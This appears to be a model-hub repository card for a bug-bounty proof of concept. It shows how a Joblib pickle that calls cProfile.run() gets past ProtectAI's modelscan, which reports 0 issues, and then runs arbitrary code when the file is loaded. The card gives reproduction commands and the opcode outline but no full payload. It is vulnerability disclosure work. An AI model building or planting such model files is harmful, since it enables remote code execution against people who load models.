You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

ModelScan Bypass PoC β€” Joblib Format (cProfile.run)

Summary

This repository demonstrates a bypass of ProtectAI's modelscan scanner using the cProfile.run() technique in Joblib format.

Vulnerability

  • Scanner: modelscan v0.7.6 (latest as of 2026-04-06)
  • Format: Joblib (.joblib) β€” listed as premium format on Huntr MFV
  • Technique: cProfile.run(stmt) internally calls exec(stmt), achieving full RCE
  • Blocklist gap: Neither cProfile module nor its run function appear in modelscan's unsafe_globals
  • Scan result: 0 issues found

Impact

An attacker can upload a malicious .joblib model file to any model registry. When a victim loads it with joblib.load() or pickle.load(), arbitrary code executes.

Reproduction

# Scan with modelscan β€” reports 0 issues
modelscan scan -p model.joblib

# Load to trigger RCE
python3 -c "import joblib; joblib.load('model.joblib')"
# Creates /tmp/joblib_pwned.txt with proof of execution

Technical Details

The pickle bytecode uses:

  1. STACK_GLOBAL to resolve cProfile.run
  2. REDUCE to call it with an arbitrary Python statement
  3. cProfile.run() internally calls exec(compile(stmt)), executing arbitrary code

This is the same technique as the pickle bypass but targeting the Joblib format specifically, which is listed as a separate premium format on the Huntr MFV bounty program.

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support